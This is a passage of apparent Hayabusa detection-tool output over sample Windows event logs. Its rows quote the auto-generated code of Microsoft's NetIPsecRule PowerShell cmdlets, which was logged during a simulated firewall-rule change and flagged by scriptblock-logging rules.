$__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) 
$__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) 
$__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default')",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 
+00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"SetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) 
$__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and 
(@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"} if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 
'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 
'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] 